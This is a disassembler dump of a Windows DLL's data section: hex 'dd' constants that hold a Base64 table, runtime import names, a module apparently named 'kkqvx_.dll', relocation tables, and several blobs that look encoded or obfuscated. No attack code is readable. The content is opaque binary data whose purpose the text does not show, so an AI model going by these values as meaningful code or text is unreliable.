dd 9000138h, 3F1C5000h, 33193431h, 113E3Fh, 4D01000Bh
dd 4265606Eh, 6E727374h, 0E004073h, 0A587C000h, 0AEA997B4h
dd 94B7AFA4h, 81B4B8A5h, 99000D00h, 0CEEDFCDEh, 0F6FDF7F0h
dd 0FAFCCBEEh, 0E00EDh, 47567433h, 575D5A64h, 5C7F445Ch
dd 72545Dh, 0EAAD0009h, 0C4FAD9C8h, 0DAC2C9C3h, 94000B00h
dd 0D9E0F1D3h, 0F5E7E7F1h, 0D5F1F3h, 61260013h, 49605243h
dd 54414354h, 42485349h, 42484F71h, 0D005149h, 50723500h
dd 54597641h, 547B4646h, 745058h, 793D0010h, 5C4D4E54h
dd 70555E49h, 5C4E4E58h, 7C585Ah, 2C68000Dh, 1A1C1B0Dh
dd 13F1107h, 1F070C06h, 0C3000E00h, 94A5A687h, 0ACA7ADAAh
dd 0ACB193B4h, 0F0082A0h, 0C9F8BB00h, 0DECFDADEh, 0DFD5D2ECh
dd 0C3FECCD4h, 0F00FAh, 4F426023h, 4D4A744Fh, 73544C47h
dd 62404C51h, 0D2000A00h, 0A0B7A1A7h, 0B6FCE0E1h, 0A00BEBEh
dd 5F592C00h, 1E1F5E49h, 40404802h, 89000F00h, 0EDD5FAACh
dd 0FCACE5EFh, 0A7BBBAF3h, 0E5E5EDh, 0FBDE000Fh, 0B8B582ADh
dd 0A4B2ABFBh, 0BAF0ECEDh, 400B2B2h, 0BAFCD900h, 80085E3h
dd 0A7D4F400h, 0BDA2A6B1h, 600B1B7h, 171D4E00h, 30B1A1Dh
dd 0B6000600h, 9BC7DDDDh, 800CEC0h, 0BBEDC800h, 0B0BCA597h
dd 0A00BDEDh, 42572400h, 574B7B47h, 4848400Ah, 10000A00h
dd 4F737663h, 743E637Fh, 4007C7Ch, 0EBAD8800h, 0C00D4B2h
dd 0A68BCF00h, 0AA88BFBCh, 0BDAE9FBBh, 0B00A2AEh, 3C0B5D00h
dd 333C342Fh, 34331429h, 0C0029h, 8093A4F2h, 869C939Bh
dd 93979EB1h, 0D0080h, 242E0457h, 32322511h, 3E252304h
dd 0E003039h, 0B993C000h, 0ACAC81B3h, 0B493A3AFh, 0A7AEA9B2h
dd 78000C00h, 191D1417h, 4A4B0C0Dh, 14141C56h, 0E0000C00h
dd 81858C8Fh, 0D2D39495h, 8C8C84CEh, 90000200h, 100B0B0h
dd 0EDC200h, 0A8C50012h, 0A9B1A6B6h, 0B1B69AB6h, 0B6B0B1A4h
dd 0F6B7A4A7h, 0E00F7h, 3E3D085Ch, 3832350Bh, 301F2B33h
dd 2F2F3Dh, 5F230001h, 91000200h, 100EDB1h, 0CFF500h, 6E4E0004h
dd 743B6Bh, 0EE920001h, 74000A00h, 3B324854h, 514E3926h
dd 0B004A01h, 0E6FADA00h, 979B889Ch, 0AFFFE09Fh, 0A00E4h
dd 0D2A8B494h, 0D1D9D5C6h, 0AAD9AEh, 400h, 0A600C800h
dd 0A500A900h, 0AD00h, 500h, 33004500h, 29002400h, 20003000h
dd 41000000h, 45444342h, 49484746h, 4D4C4B4Ah, 51504F4Eh
dd 55545352h, 59585756h, 6362615Ah, 67666564h, 6B6A6968h
dd 6F6E6D6Ch, 73727170h, 77767574h, 307A7978h, 34333231h
dd 38373635h, 2F2B39h, 2F2F3Ah, 0A0597200h, 0CFF6A89Bh
dd 42A411h, 8F0AC9A0h, 4106E039h, 0D0399AFEh, 8CA411h
dd 8F0AC9A0h, 0A715A039h, 0D0658734h, 4A9211h, 0ACC7AF20h
dd 50F25B4Dh, 0CF98B530h, 82BB11h, 0CEBD00AAh, 96B2840Bh
dd 1ABAB4B1h, 9CB610h, 1D3400AAh, 2040007h, 0
dd 0C000h, 0
dd 2C442546h, 0D026CB33h, 83B411h, 1D94FC0h, 50F21F19h
dd 0CF98B530h, 82BB11h, 0CEBD00AAh, 50F1FF0Bh, 0CF98B530h
dd 82BB11h, 0CEBD00AAh, 50F1F70Bh, 0CF98B530h, 82BB11h
dd 0CEBD00AAh, 50F2400Bh, 0CF98B530h, 82BB11h, 0CEBD00AAh
dd 2C44270Bh, 0D026CB33h, 83B411h, 1D94FC0h, 0CB690019h
dd 0CF4D9585h, 0C9611h, 0EEF4C780h, 85h, 0
dd 0C000h, 0
dd 0C166146h, 0D0CDAFD3h, 3E8A11h, 0E2C94FC0h, 6Eh, 45h dup(0)
dd 1507000h, 2 dup(0)
dd 1518400h, 150AC00h, 1508400h, 2 dup(0)
dd 151A000h, 150C000h, 12h dup(0)
dd 150E800h, 150F800h, 1511400h, 2 dup(0)
dd 1512000h, 1512C00h, 1514000h, 1514C00h, 1515800h, 1516400h
dd 1516C00h, 1517800h, 2 dup(0)
dd 150E800h, 150F800h, 1511400h, 2 dup(0)
dd 1512000h, 1512C00h, 1514000h, 1514C00h, 1515800h, 1516400h
dd 1516C00h, 1517800h, 2 dup(0)
dd 45009B00h, 50746978h, 65636F72h, 7373h, 47012400h, 6E457465h
dd 6F726976h, 6E656D6Eh, 72745374h, 73676E69h, 41h, 52027800h
dd 6E556C74h, 646E6977h, 5F008000h, 706F6466h, 6E65h, 5F014F00h
dd 6E65706Fh, 66736F5Fh, 646E6168h, 656Ch, 66020D00h, 736F6C63h
dd 65h, 5F003900h, 69786563h, 74h, 6D024E00h, 6F6C6C61h
dd 63h, 72026000h, 65736961h, 73026700h, 75627465h, 66h
dd 73027500h, 70637274h, 79h, 52454B00h, 334C454Eh, 6C642E32h
dd 6Ch, 1500000h, 2 dup(1500010h), 54524310h, 2E4C4C44h
dd 4C4C44h, 1501400h, 7 dup(1501410h), 10h, 0Dh dup(0)
dd 2000h, 0
dd 2000h, 100000h, 0C20000h, 0D00000h, 1060000h, 78h dup(0)
dd 100000h, 14800h, 8C303100h, 0FD30F330h, 13310530h, 21311931h
dd 0B6312731h, 0FC31EF31h, 0E320131h, 23321332h, 3E322932h
dd 2F32B432h, 42333533h, 5A335433h, 8A338533h, 0BB339133h
dd 0D233CC33h, 0EE33E733h, 2B341633h, 6F345434h, 0A1347634h
dd 0E834A734h, 0FC34F534h, 10350834h, 71356835h, 0A5358135h
dd 0C335BC35h, 0DB35D235h, 0E35E235h, 4A362536h, 0C5367F36h
dd 0F336CB36h, 1036F936h, 4C372737h, 81377137h, 9D379137h
dd 0B737A837h, 0A37E337h, 20381038h, 76383338h, 0B8389238h
dd 1338EA38h, 40392C39h, 6F395D39h, 0A2397639h, 0F239A839h
dd 1B3A0239h, 453A2F3Ah, 853A5C3Ah, 0BC3AB53Ah, 0EA3ADC3Ah
dd 33AFD3Ah, 653B393Bh, 793B6B3Bh, 943B7F3Bh, 0C33BB93Bh
dd 0F73BF03Bh, 373C253Bh, 653C4A3Ch, 7C3C753Ch, 0C43CA03Ch
dd 0EC3CCA3Ch, 143CF53Ch, 2F3D1E3Dh, 533D363Dh, 783D593Dh
dd 8C3D863Dh, 0AA3DA13Dh, 0CA3DB53Dh, 0DE3DD03Dh, 173DE83Dh
dd 3C3E1D3Eh, 4F3E453Eh, 693E583Eh, 803E733Eh, 9B3E863Eh
dd 0B13EA53Eh, 343EFF3Eh, 633F3A3Fh, 0A13F7A3Fh, 0BA3FA83Fh
dd 0D53FCB3Fh, 20003Fh, 28400h, 30302900h, 67305030h, 84307E30h
dd 0BC30B630h, 0F730C330h, 330FC30h, 19311331h, 4C314531h
dd 71316B31h, 0B831B331h, 0E531D131h, 0FE31F931h, 25321131h
dd 89327D32h, 0B0329C32h, 0C832B532h, 15330832h, 0C2332133h
dd 0E433D633h, 0D33F633h, 1A341434h, 2F342934h, 53344234h
dd 79345934h, 90348534h, 0BA34AB34h, 0D434C734h, 0EC34DF34h
dd 0FA34F134h, 0C350734h, 1D351135h, 28352335h, 39352D35h
dd 44353F35h, 55354935h, 60355B35h, 71356535h, 7C357735h
dd 90358135h, 9B359635h, 0AB35A535h, 0C535B035h, 0E535CC35h
dd 535EC35h, 47360C36h, 6A365836h, 85367F36h, 0A0368F36h
dd 0B236AD36h, 0C836BB36h, 0D336CD36h, 0E536DB36h, 0F036EB36h
dd 0C370436h, 26371637h, 58374137h, 6E376937h, 8F378537h
dd 0CD37C837h, 0DE37D837h, 0D37F937h, 1E381838h, 44383838h
dd 87386A38h, 9D389738h, 0D338C538h, 0FD38E838h, 11390338h
dd 38392339h, 98394939h, 0AA39A239h, 0B939B039h, 0DE39C139h
dd 0FC39F439h, 123A0139h, 243A1C3Ah, 3B3A353Ah, 513A4B3Ah
dd 633A583Ah, 893A7C3Ah, 9C3A903Ah, 0C33AA93Ah, 0D73AC93Ah
dd 0EB3AE13Ah, 0FE3AF43Ah, 0F3B093Ah, 203B1A3Bh, 2C3B263Bh
dd 3F3B383Bh, 583B4E3Bh, 0A03B933Bh, 0B13BAC3Bh, 0CE3BBD3Bh
dd 0D93BD43Bh, 0F63BE53Bh, 23BFC3Bh, 0D3C073Ch, 183C123Ch
dd 223C1D3Ch, 343C2E3Ch, 493C3E3Ch, 543C4E3Ch, 5F3C593Ch
dd 6A3C643Ch, 753C6F3Ch, 883C7A3Ch, 993C933Ch, 0A83CA13Ch
dd 0C13CB63Ch, 0CD3CC63Ch, 0E23CDB3Ch, 0EF3CE73Ch, 0C3CF43Ch
dd 2D3D233Dh, 543D4E3Dh, 683D593Dh, 743D6E3Dh, 943D7B3Dh
dd 0AD3DA03Dh, 0C83DB53Dh, 0E03DCD3Dh, 0F23DED3Dh, 83DFB3Dh
dd 123E0D3Eh, 243E1E3Eh, 2E3E293Eh, 403E3A3Eh, 4A3E453Eh
dd 5C3E563Eh, 663E613Eh, 783E723Eh, 823E7D3Eh, 943E8E3Eh
dd 9E3E993Eh, 0B03EAA3Eh, 0BA3EB53Eh, 0CC3EC63Eh, 0D63ED13Eh
dd 0E83EE23Eh, 0F23EED3Eh, 43EFE3Eh, 0E3F093Fh, 203F1A3Fh
dd 2A3F253Fh, 3C3F363Fh, 463F413Fh, 583F523Fh, 623F5D3Fh
dd 743F6E3Fh, 7E3F793Fh, 903F8A3Fh, 9A3F953Fh, 0AC3FA63Fh
dd 0B63FB13Fh, 0C83FC23Fh, 0D23FCD3Fh, 0E43FDE3Fh, 0EE3FE93Fh
dd 3FFA3Fh, 300000h, 29000h, 5300000h, 16300A30h, 21301C30h
dd 32302630h, 3D303830h, 4E304230h, 59305430h, 6A305E30h
dd 75307030h, 86307A30h, 91308C30h, 0A2309630h, 0AD30A830h
dd 0BE30B230h, 0C930C430h, 0DD30CE30h, 0E830E330h, 730FF30h
dd 19311331h, 23311E31h, 35312F31h, 3F313A31h, 51314B31h
dd 5B315631h, 6D316731h, 77317231h, 89318331h, 93318E31h
dd 0A5319F31h, 0AF31AA31h, 0C131BB31h, 0CB31C631h, 0DD31D731h
dd 0E731E231h, 0F931F331h, 331FE31h, 15320F32h, 1F321A32h
dd 31322B32h, 3B323632h, 4D324732h, 57325232h, 69326332h
dd 73326E32h, 85327F32h, 8F328A32h, 0A1329B32h, 0AB32A632h
dd 0BD32B732h, 0C732C232h, 0D932D332h, 0E332DE32h, 0F532EF32h
dd 0FF32FA32h, 11330B32h, 1B331633h, 2D332733h, 37333233h
dd 49334333h, 53334E33h, 65335F33h, 6F336A33h, 81337B33h
dd 8B338633h, 9D339733h, 0A733A233h, 0B933B333h, 0C333BE33h
dd 0D533CF33h, 0DF33DA33h, 0F133EB33h, 0FB33F633h, 0D340733h
dd 17341234h, 29342334h, 33342E34h, 45343F34h, 4F344A34h
dd 61345B34h, 6B346634h, 7D347734h, 87348234h, 99349334h
dd 0A3349E34h, 0B534AF34h, 0BF34BA34h, 0D134CB34h, 0DB34D634h
dd 0ED34E734h, 0F734F234h, 9350334h, 13350E35h, 25351F35h
dd 2F352A35h, 41353B35h, 4B354635h, 5D355735h, 67356235h
dd 79357335h, 83357E35h, 95358F35h, 9F359A35h, 0B735B135h
dd 0D535BC35h, 0E735DB35h, 0C35F035h, 25361336h, 51362B36h
dd 80367536h, 0BF36B936h, 4336FA36h, 64374937h, 0A837A037h
dd 0C237BC37h, 0EC37E537h, 7380137h, 23381A38h, 6B383D38h
dd 0A1389B38h, 0C038AD38h, 0E738D338h, 138FB38h, 13390639h
dd 1E391939h, 31392B39h, 43393639h, 4E394939h, 8E398639h
dd 9A399439h, 0C239AD39h, 0D639CF39h, 0D39FA39h, 673A323Ah
dd 0B13AAA3Ah, 0E03AC73Ah, 0D3AE63Ah, 383B133Bh, 993B3E3Bh
dd 0A3BF33Bh, 2E3C173Ch, 583C413Ch, 883C823Ch, 0ED3CBC3Ch
dd 2E3D243Ch, 793D4E3Dh, 923D7F3Dh, 0D83DCE3Dh, 653E143Dh
dd 733E6D3Eh, 873E803Eh, 9A3E943Eh, 0B63EA83Eh, 0CD3EBD3Eh
dd 0ED3EDB3Eh, 23EF43Eh, 183F0E3Fh, 2A3F233Fh, 643F353Fh
dd 7A3F6B3Fh, 0A93F8C3Fh, 0C63FB23Fh, 3FD33Fh, 400000h
dd 1F000h, 2F302900h, 0A9309E30h, 0CA30C430h, 0FE30F630h
dd 61315530h, 76317031h, 0C3317D31h, 0EF31E931h, 26320731h
dd 33322E32h, 3E323932h, 56324532h, 77325D32h, 93328C32h
dd 0B2329B32h, 0C832BE32h, 0D532CE32h, 0E432DD32h, 932EA32h
dd 31331E33h, 57334133h, 86337A33h, 0B1339533h, 0CE33C333h
dd 0E033DB33h, 0F633E933h, 33FB33h, 12340C34h, 1C341734h
dd 2E342834h, 38343334h, 4A344434h, 54344F34h, 66346034h
dd 70346B34h, 85347F34h, 98348A34h, 0C234B534h, 0D034C734h
dd 0E234DD34h, 0F334E734h, 0FE34F934h, 12350334h, 1D351835h
dd 4E353435h, 80356235h, 90358A35h, 0A3359735h, 0B735AA35h
dd 0CD35C735h, 635F235h, 39363036h, 4F364536h, 62365536h
dd 6F366936h, 8A368336h, 0B4369536h, 0DA36D436h, 0FE36EB36h
dd 17370A36h, 2F372037h, 46373B37h, 62375237h, 80376C37h
dd 95378F37h, 0B437AD37h, 0DC37C137h, 437E237h, 32381038h
dd 46383C38h, 64384C38h, 94386B38h, 0AA389D38h, 0BB38B438h
dd 0CF38C238h, 0E038DA38h, 0F738F138h, 37393238h, 48394239h
dd 9B396239h, 0BF39AC39h, 0D839D339h, 0F539EB39h, 1739FB39h
dd 3D3A2D3Ah, 543A4D3Ah, 643A5D3Ah, 853A703Ah, 0A33A8D3Ah
dd 0C53ABA3Ah, 0E63ACC3Ah, 0FF3AF93Ah, 1C3B103Ah, 4A3B2E3Bh
dd 5B3B553Bh, 0A73B923Bh, 0C43BBD3Bh, 0E63BD13Bh, 0FB3BF23Bh
dd 0B3C053Bh, 2E3C213Ch, 433C3A3Ch, 553C4C3Ch
dd 773C663Ch, 903C7D3Ch, 0ED3CD03Ch, 3E3D2A3Ch, 0C23D5B3Dh
dd 0D93DC93Dh, 0F33DE03Dh, 63DF93Dh, 253E0D3Eh, 593E4C3Eh
dd 0A53E5E3Eh, 0B83EAB3Eh, 0DF3EBE3Eh, 93EF83Eh, 373F213Fh
dd 993F933Fh, 0B63FAF3Fh, 0DC3FCE3Fh, 0FB3FE33Fh, 50003Fh
dd 21800h, 1F300900h, 41302E30h, 4D304630h, 97308730h
dd 0AF30A130h, 0C730B830h, 0DC30D130h, 0FB30EE30h, 1A310730h
dd 2E312131h, 40313731h, 55314A31h, 68315E31h, 0B3316D31h
dd 0BE31B931h, 0D531C831h, 0E331DA31h, 0F531F031h, 631FA31h
dd 11320C32h, 22321632h, 2D322832h, 3E323232h, 49324432h
dd 5D324E32h, 68326332h, 7D327032h, 8B328232h, 9D329832h
dd 0AF32A232h, 0BA32B532h, 0F732EE32h, 1B330932h, 3D332833h
dd 5A335133h, 95336833h, 0B133A733h, 0DD33B733h, 0F633E433h
dd 22341733h, 50344334h, 64345E34h, 75347034h, 99347B34h
dd 0B934A034h, 0D934C034h, 1334E034h, 21351B35h, 32352735h
dd 60353935h, 6D356735h, 0A1357235h, 0B035AA35h, 0C435BB35h
dd 0D835CB35h, 135DE35h, 36360E36h, 53363C36h, 6F366936h
dd 95368E36h, 0F636AD36h, 1A36FC36h, 37373037h, 8B378237h
dd 0E437A037h, 0FF37F837h, 24381837h, 53383D38h, 79385F38h
dd 0B638AF38h, 0E138D638h, 0F438ED38h, 47391038h, 70396239h
dd 88398239h, 0B539A539h, 0CD39BE39h, 0EE39DB39h, 1439F939h
dd 253A1E3Ah, 4E3A313Ah, 6E3A5A3Ah, 8F3A753Ah, 0BD3A9D3Ah
dd 0D33ACC3Ah, 0F73AE93Ah, 173AFC3Ah, 283B223Bh, 483B3F3Bh
dd 673B573Bh, 8B3B733Bh, 9C3B963Bh, 0AF3BA93Bh, 0C33BB63Bh
dd 233BE73Bh, 0D13C9B3Ch, 0E63CD83Ch, 0FA3CED3Ch, 0E3D083Ch
dd 2A3D213Dh, 3B3D353Dh, 523D4B3Dh, 693D633Dh, 7E3D783Dh
dd 993D893Dh, 0B03DA73Dh, 0C83DB93Dh, 0DD3DCE3Dh, 0F03DE33Dh
dd 43DF63Dh, 1D3E103Eh, 363E2A3Eh, 4D3E413Eh, 663E563Eh
dd 763E6F3Eh, 813E7C3Eh, 0A63E9D3Eh, 0B53EAD3Eh, 0C23EBA3Eh
dd 0D83ECE3Eh, 0F23EE63Eh, 0D3F073Eh, 253F143Fh, 3C3F2D3Fh
dd 523F4C3Fh, 6C3F653Fh, 973F883Fh, 0AF3F9E3Fh, 0BF3FB63Fh
dd 0D03FC63Fh, 0E83FD63Fh, 0FF3FF03Fh, 60003Fh, 1C000h
dd 19300C00h, 39303330h, 4B303F30h, 71306A30h, 0AE308630h
dd 0C030B430h, 0E430D630h, 0FC30F630h, 11310830h, 53312E31h
dd 76316031h, 9D318331h, 0C331A431h, 0E931CE31h, 631FF31h
dd 26321A32h, 3A322B32h, 71324C32h, 0B5327D32h, 0E932D132h
dd 732EF32h, 25330D33h, 43332B33h, 73336D33h, 90338A33h
dd 0A3339A33h, 0B233A833h, 0C033B733h, 0E133CB33h, 0FD33F133h
dd 19340433h, 43342D34h, 78346634h, 9B349434h, 0C834AD34h
dd 0FE34DA34h, 28350434h, 40352E35h, 60355A35h, 8E357235h
dd 0A7359535h, 0DB35D235h, 335E235h, 43361E36h, 5C365536h
dd 74366436h, 0BB368F36h, 0E036D536h, 0F736E636h, 136FC36h
dd 10370A37h, 2B371737h, 44373837h, 5F374B37h, 98376637h
dd 0AD37A737h, 0D537C137h, 0EB37DC37h, 1137FD37h, 6B382138h
dd 9C387D38h, 0B638A538h, 0C838BC38h, 0F838D438h, 1C390938h
dd 35393039h, 5D394839h, 83397339h, 0AF39A839h, 0EA39CC39h
dd 3139F039h, 543A373Ah, 0BC3A5C3Ah, 3AC43Ah, 273B063Bh
dd 513B403Bh, 803B573Bh, 0D73BC93Bh, 0A3BE83Bh, 223C163Ch
dd 7D3C6C3Ch, 0A33C8F3Ch, 0BE3CAA3Ch, 0D63CD03Ch, 0FC3CEA3Ch
dd 173D033Ch, 313D2B3Dh, 4E3D473Dh, 683D623Dh, 883D7E3Dh
dd 0B23D9E3Dh, 0CF3DB93Dh, 0EA3DD83Dh, 103DF03Dh, 373E183Eh
dd 473E3E3Eh, 5B3E4D3Eh, 7D3E623Eh, 0A33E843Eh, 0BB3EB13Eh
dd 0CF3EC73Eh, 0F03EEA3Eh, 143EF73Eh, 323F1A3Fh, 493F413Fh
dd 6A3F513Fh, 7C3F733Fh, 0AD3F853Fh, 0C63FB23Fh, 0FA3FDE3Fh
dd 70003Fh, 25000h, 39302300h, 52303F30h, 65305A30h, 0A8309D30h
dd 0DC30C430h, 0F530EF30h, 0D310430h, 2E312731h, 5C314031h
dd 74316331h, 0AF318431h, 0CD31B631h, 0F131D331h, 131F731h
dd 1C320C32h, 4E324732h, 6E325432h, 80327932h, 0AB328E32h
dd 0CA32B332h, 0D932D332h, 0EB32E432h, 432FB32h, 12330B33h
dd 22331B33h, 3E333933h, 6D334E33h, 80337933h, 0A1339433h
dd 0B533A833h, 0D533BC33h, 0E533DB33h, 233FD33h, 2B341134h
dd 64344334h, 94346934h, 0AA349A34h, 0BB34B434h, 0DE34D834h
dd 0FF34E834h, 13350834h, 29352335h, 38353235h, 47354135h
dd 5A355035h, 76357135h, 0B1358635h, 0C335B735h, 0D435CA35h
dd 0E835DE35h, 0B35EE35h, 1B361136h, 38363336h, 76364836h
dd 89367C36h, 99369236h, 0A936A236h, 0CE36C836h, 0F036D836h
dd 0FD36F736h, 2C371136h, 41373A37h, 66376037h, 7E376B37h
dd 0A2379137h, 0C537A837h, 0E037CB37h, 37F037h, 31382B38h
dd 42383C38h, 57384D38h, 91387938h, 0B5389638h, 0C038BB38h
dd 0FB38D038h, 13390238h, 3F391E39h, 52394639h, 6E396939h
dd 0AC397E39h, 0B939B339h, 0D139C439h, 0E339DD39h, 0F939ED39h
dd 203A1639h, 563A383Ah, 783A5C3Ah, 8B3A7E3Ah, 0A63A903Ah
dd 0C83AAC3Ah, 0DB3ACE3Ah, 0F63AE03Ah, 183AFC3Ah, 2B3B1E3Bh
dd 463B303Bh, 683B4C3Bh, 7B3B6E3Bh, 963B803Bh, 0B03B9C3Bh
dd 0C33BB63Bh, 0D23BC93Bh, 0DF3BD93Bh, 13BE43Bh, 693C5B3Ch
dd 793C6F3Ch, 923C863Ch, 0AC3C9C3Ch, 0D63CBC3Ch, 0EE3CE73Ch
dd 93CFE3Ch, 283D0F3Dh, 493D3C3Dh, 593D4F3Dh, 683D613Dh
dd 893D793Dh, 0A83D993Dh, 0BD3DB73Dh, 0CF3DC83Dh, 0E63DE13Dh
dd 83DF63Dh, 193E0E3Eh, 303E233Eh, 533E453Eh, 733E583Eh
dd 8C3E7E3Eh, 9A3E923Eh, 0A93EA33Eh, 0C13EB53Eh, 0D23EC73Eh
dd 0DD3ED73Eh, 0F03EE93Eh, 143F0A3Eh, 243F1B3Fh, 4F3F343Fh
dd 5A3F553Fh, 713F643Fh, 7F3F763Fh, 913F8C3Fh, 0A23F963Fh
dd 0AD3FA83Fh, 0BE3FB23Fh, 0C93FC43Fh, 0DA3FCE3Fh, 0E53FE03Fh
dd 0F63FEA3Fh, 3FFC3Fh, 800000h, 1FC00h, 6300100h, 18301230h
dd 22301D30h, 34302E30h, 3E303930h, 50304A30h, 5A305530h
dd 6C306630h, 76307130h, 88308230h, 92308D30h, 0A4309E30h
dd 0AE30A930h, 0C030BA30h, 0CA30C530h, 0DC30D630h, 0E630E130h
dd 0F830F230h, 230FD30h, 17311131h, 4B311C31h, 63315B31h
dd 0BB31AD31h, 0D931C831h, 0EE31E631h, 21321331h, 31322632h
dd 64325F32h, 8B327D32h, 0A5329E32h, 0C432B632h, 0D632C932h
dd 0F532E532h, 48332F32h, 69335E33h, 76337033h, 0C533A533h
dd 0E933D633h, 933FE33h, 28341034h, 3A343434h, 4C344734h
dd 66345F34h, 83347634h, 99349234h, 534D034h, 27351F35h
dd 67355635h, 82357B35h, 0AA359235h, 0C235B035h, 0D235CB35h
dd 0F435D935h, 10360535h, 46362336h, 5D364D36h, 93367136h
dd 0B636B036h, 0FA36C336h, 1E371736h, 42373B37h, 73375A37h
dd 81377B37h, 91378737h, 0C337AD37h, 0D937D337h, 37DE37h
dd 23381A38h, 34382E38h, 48383D38h, 75384E38h, 81387A38h
dd 0C438BF38h, 0DF38D738h, 2338E538h, 48394239h, 78396239h
dd 8F397F39h, 0B5399539h, 0D139C639h, 3339E039h, 623A4C3Ah
dd 813A683Ah, 9D3A973Ah, 0B93AA83Ah, 0DA3AC13Ah, 0ED3AE73Ah
dd 43AFA3Ah, 343B2E3Bh, 483B3B3Bh, 6C3B4E3Bh, 953B8F3Bh
dd 0A03B9A3Bh, 0B53BAE3Bh, 0C73BC13Bh, 0EA3BD63Bh, 0FA3BF03Bh
dd 213C0D3Bh, 4A3C443Ch, 5D3C4F3Ch, 753C693Ch, 8A3C7B3Ch
dd 0A43C9E3Ch, 0C13CAE3Ch, 0F83CD53Ch, 53CFE3Ch, 193D133Dh
dd 4C3D3A3Dh, 9F3D523Dh, 193DA53Dh, 5C3E503Eh, 713E613Eh
dd 913E7D3Eh, 0B53E963Eh, 0CF3EBB3Eh, 0DF3ED53Eh, 63EF23Eh
dd 203F1A3Fh, 463F2D3Fh, 603F4C3Fh, 6D3F663Fh, 0A53F8A3Fh
dd 0C13FAB3Fh, 0E23FDC3Fh, 3FF53Fh, 900000h, 1D000h, 16301000h
dd 44302930h, 54304A30h, 9F309230h, 0DB30C730h, 0F530EF30h
dd 43310B30h, 61314931h, 86317731h, 96318D31h, 0A5319D31h
dd 0BF31B831h, 0E331D131h, 42323931h, 84327D32h, 0D332AD32h
dd 0E632D932h, 0FC32F532h, 32330C32h, 47334033h, 71335933h
dd 94338433h, 0AC339A33h, 0C133B233h, 0E733D733h, 33F933h
dd 2C341A34h, 40343834h, 5B345534h, 9E346134h, 0BB34B534h
dd 0DB34CD34h, 634FF34h, 35352235h, 52353E35h, 78356A35h
dd 0A1358035h, 0E735D535h, 0F835F235h, 0F360435h, 1F361736h
dd 33362536h, 63365A36h, 7C367636h, 0A5369E36h, 0DD36C336h
dd 0F136E236h, 1536F936h, 33372437h, 48374337h, 78375737h
dd 0A0378337h, 0C137A637h, 0D537C637h, 8380237h, 27381838h
dd 4C383538h, 66385838h, 8E388038h, 0B0389738h, 0EC38D038h
dd 12390B38h, 48394239h, 8A398339h, 9F399839h, 0C739B439h
dd 0ED39DA39h, 539FC39h, 413A253Ah, 5F3A553Ah, 8E3A653Ah
dd 0B53AAF3Ah, 0CB3AC53Ah, 0DD3AD83Ah, 143AE93Ah, 463B313Bh
dd 5D3B503Bh, 773B623Bh, 0B13B853Bh, 0D53BC23Bh, 0EE3BE93Bh
dd 0B3C013Bh, 1E3C113Ch, 3A3C243Ch, 523C463Ch, 763C683Ch
dd 913C843Ch, 9C3C963Ch, 0B83CAC3Ch, 0DD3CBF3Ch, 0FD3CE43Ch
dd 1D3D043Ch, 4D3D243Dh, 5F3D5A3Dh, 753D683Dh, 803D7A3Dh
dd 953D883Dh, 0A03D9B3Dh, 0D03DBF3Dh, 0F73DE33Dh, 0F3DFC3Dh
dd 1F3E193Eh, 403E2C3Eh, 773E6A3Eh, 9C3E7C3Eh, 0C53EA33Eh
dd 0D53ECE3Eh, 0E03EDB3Eh, 0FF3EF93Eh, 273F1C3Eh, 6F3F653Fh
dd 823F7C3Fh, 0B43F943Fh, 0E83FCA3Fh, 0A0003Fh, 10800h
dd 52303300h, 65305B30h, 86307F30h, 1F30BA30h, 59312631h
dd 6F316031h, 83317531h, 95318E31h, 0B9327F31h, 0E132CD32h
dd 0F532E732h, 0D933B332h, 18341033h, 67346034h, 7E347734h
dd 98349134h, 0B834A934h, 0D034BE34h, 0E634D634h, 81356034h
dd 0D8358835h, 62365C35h, 0CD36A736h, 3B372E36h, 6E374037h
dd 83377D37h, 0A3378D37h, 0F737D437h, 1537FD37h, 31382A38h
dd 7A384B38h, 87388138h, 0BE38B438h, 2238CE38h, 42392939h
dd 5B395539h, 74396E39h, 0A0399339h, 0D139BB39h, 193A0E39h
dd 8C3A863Ah, 0A83A9A3Ah, 0C93AC23Ah, 0E13ADB3Ah, 0F53AEF3Ah
dd 2C3B1A3Ah, 4E3B3B3Bh, 7A3B713Bh, 0E03B8A3Bh, 173C103Bh
dd 903C5D3Ch, 0A3C973Ch, 2A3D103Dh, 583D313Dh, 773D5E3Dh
dd 983D7D3Dh, 0B53DAF3Dh, 0DD3DD13Dh, 4F3DE33Dh, 8F3E563Eh
dd 283F1E3Eh, 3A3F343Fh, 4C3F463Fh, 3F993Fh, 0B00000h
dd 0C800h, 55304100h, 6A306430h, 8D307C30h, 0A9309430h
dd 0C830C130h, 0F030DC30h, 46313130h, 5F314E31h, 71316631h
dd 9A317831h, 0B531A031h, 0DE31CD31h, 0FE31E531h, 18320531h
dd 38321F32h, 61324A32h, 9C326732h, 0B832B232h, 0D032CA32h
dd 0DF32D932h, 1E330E32h, 57333E33h, 77335D33h, 94337E33h
dd 0AA33A333h, 0E333C233h, 0F833EF33h, 17340A33h, 33342A34h
dd 5F345334h, 8F347834h, 0BE34A834h, 0D734C834h, 0F334DD34h
dd 12350034h, 3C351935h, 82356835h, 9C359135h, 0C035B635h
dd 235E335h, 96362036h, 0A6369E36h, 0AF36AE36h, 0BE3EB63Eh
dd 0BA3EC63Eh, 0D23FC63Fh, 0EA3FDE3Fh, 3FF63Fh, 0C00000h
dd 1400h, 0E300200h, 26301A30h, 303230h, 1300000h, 4400h
dd 0BC300000h, 58335432h, 60335C33h, 68336433h, 74336C33h
dd 7C337833h, 84338033h, 8C338833h, 98339033h, 0A0339C33h
dd 0A833A433h, 0B033AC33h, 0B833B433h, 0C037BC37h, 37C437h
dd 1500000h, 2000h, 98319400h, 0AC319C31h, 0B431B031h
dd 0BC31B831h, 0C431C031h, 31C831h, 5Fh dup(0)
dd 7587C100h, 46h, 1802800h, 3 dup(100h), 1803400h, 1803800h
dd 1803C00h, 716B6B00h, 2E5F7876h, 6C6C64h, 983E00h, 1804000h
dd 0
dd 694C5F00h, 69614D62h, 30406Eh, 90h dup(0)
dd 7587C100h, 46h, 1802800h, 3 dup(100h), 1803400h, 1803800h
dd 1803C00h, 716B6B00h, 2E5F7876h, 6C6C64h, 983E00h, 1804000h
dd 0
dd 694C5F00h, 69614D62h, 30406Eh, 4448h dup(0)
_data ends
; ---------------------------------------------------------------------------
; Section 4. (virtual address 0003A000)
; Virtual size : 0000B03C ( 45116.)
; Section size in file : 0000B03C ( 45116.)
; Offset to raw data for section: 0003A000
; Flags 60000020: Text Executable Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
